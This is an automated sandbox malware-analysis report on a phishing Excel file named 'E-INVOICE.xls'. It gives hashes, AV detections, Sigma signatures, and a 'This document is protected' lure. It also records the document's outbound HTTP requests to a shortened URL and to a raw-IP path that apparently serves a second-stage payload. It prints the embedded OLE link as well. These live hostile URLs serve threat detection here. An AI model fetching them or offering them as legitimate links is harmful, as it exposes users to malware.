Windows Analysis Report
E-INVOICE.xls

Overview

General Information

Sample name: E-INVOICE.xls
Analysis ID: 1467962
MD5: 6586786ff2d63581546545fe37f711db
SHA1: 227eef347b15fe072cbf41c49a42d4d9f6bb4888
SHA256: 3722989fb37d2b30e4e04404660ee6757fe8dc872540ddf57e5c04b8f6307315
Tags: xls

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
AI detected suspicious Excel or Word document
Excel sheet contains many unusual embedded objects
Document embeds suspicious OLE2 link
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

AV Detection

Source: http://hop.fyi/r1FbC Avira URL Cloud: Label: phishing
Source: http://hop.fyi/r1FbC;lI(& Avira URL Cloud: Label: phishing
Source: hop.fyi Virustotal: Detection: 12%
Source: http://198.46.178.137/xampp/rg/rg.rg.rg.rgrgrgrgrg.doc Virustotal: Detection: 8%
Source: http://hop.fyi/r1FbC Virustotal: Detection: 9%
Source: E-INVOICE.xls ReversingLabs: Detection: 37%
Source: E-INVOICE.xls Virustotal: Detection: 23%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: global traffic DNS query: name: hop.fyi
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 198.46.178.137:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 198.46.178.137:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 198.46.178.137:80
Source: global traffic TCP traffic: 198.46.178.137:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 198.46.178.137:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 198.46.178.137:80
Source: global traffic TCP traffic: 198.46.178.137:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 198.46.178.137:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 198.46.178.137:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 192.185.89.92:80
Source: global traffic TCP traffic: 198.46.178.137:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 198.46.178.137:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 198.46.178.137:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 198.46.178.137:80
Source: global traffic TCP traffic: 198.46.178.137:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 198.46.178.137:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 198.46.178.137:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 198.46.178.137:80
Source: global traffic TCP traffic: 198.46.178.137:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 198.46.178.137:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 198.46.178.137:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global traffic TCP traffic: 198.46.178.137:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 198.46.178.137:80
Source: Joe Sandbox View IP Address: 198.46.178.137 198.46.178.137
Source: Joe Sandbox View IP Address: 192.185.89.92 192.185.89.92
Source: global traffic HTTP traffic detected: GET /r1FbC HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hop.fyiConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xampp/rg/rg.rg.rg.rgrgrgrgrg.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.137Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /r1FbC HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hop.fyiConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xampp/rg/rg.rg.rg.rgrgrgrgrg.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.137Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.178.137
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\955171D8.emf
Source: global traffic DNS traffic detected: DNS query: hop.fyi
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 05:13:18 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Content-Length: 300Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 34 36 2e 31 37 38 2e 31 33 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 198.46.178.137 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 05:13:35 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Content-Length: 300Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 34 36 2e 31 37 38 2e 31 33 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 198.46.178.137 Port 80</address></body></html>
Source: E-INVOICE.xls, B9030000.0.dr String found in binary or memory: http://hop.fyi/r1FbC;lI(&

System Summary

Source: E-INVOICE.xls OLE: Microsoft Excel 2007+
Source: B9030000.0.dr OLE: Microsoft Excel 2007+
Source: E-INVOICE.xls Stream path 'MBD00022108/\x1Ole' : http://hop.fyi/r1FbC;lI(&+pR_&Rw8%fG@I[ObaK(_1\+t=\+&*?.16.#<<{iNDDZ+'1ks\-B)UT4aA{0Hq/\bX/IaSiuN"%iAy0B%:cDjSXozvvr7xZ04X4iH43Zaa1IjK6AqdOHyddWrYYiZwMLhEZ1BXYmJ6vq7IDEHjWNIl9p4shJljkQ2RHql00aiYKaxXVXDpnfTvjXivzDHnY7DhLWeHVhA~a/Zdh o+7~30&k*
Source: B9030000.0.dr Stream path 'MBD00022108/\x1Ole' : http://hop.fyi/r1FbC;lI(&+pR_&Rw8%fG@I[ObaK(_1\+t=\+&*?.16.#<<{iNDDZ+'1ks\-B)UT4aA{0Hq/\bX/IaSiuN"%iAy0B%:cDjSXozvvr7xZ04X4iH43Zaa1IjK6AqdOHyddWrYYiZwMLhEZ1BXYmJ6vq7IDEHjWNIl9p4shJljkQ2RHql00aiYKaxXVXDpnfTvjXivzDHnY7DhLWeHVhA~a/Zdh o+7~30&k*
Source: classification engine Classification label: mal72.winXLS@1/8@1/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\B9030000
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR78F6.tmp
Source: E-INVOICE.xls OLE indicator, Workbook stream: true
Source: B9030000.0.dr OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: E-INVOICE.xls ReversingLabs: Detection: 37%
Source: E-INVOICE.xls Virustotal: Detection: 23%
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: E-INVOICE.xls Initial sample: OLE indicators vbamacros = False
Source: E-INVOICE.xls Initial sample: OLE indicators encrypted = True

Persistence and Installation Behavior

Source: Office document LLM: Score: 9 Reasons: The screenshot contains a visually prominent message stating 'This document is protected' alongside a recognizable Microsoft Office logo, which can create a false sense of legitimacy. The text 'This document is protected' implies that the user needs to take action to view the document, creating a sense of urgency. The use of the Microsoft Office logo is an attempt to impersonate a well-known brand, which can mislead users into trusting the document. The combination of these elements strongly suggests that the document could be used to trick users into clicking on a potentially harmful link, leading to a phishing page or malware download.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: E-INVOICE.xls Stream path 'Workbook' entropy: 7.99648221014 (max. 8.0)
Source: B9030000.0.dr Stream path 'Workbook' entropy: 7.99639050495 (max. 8.0)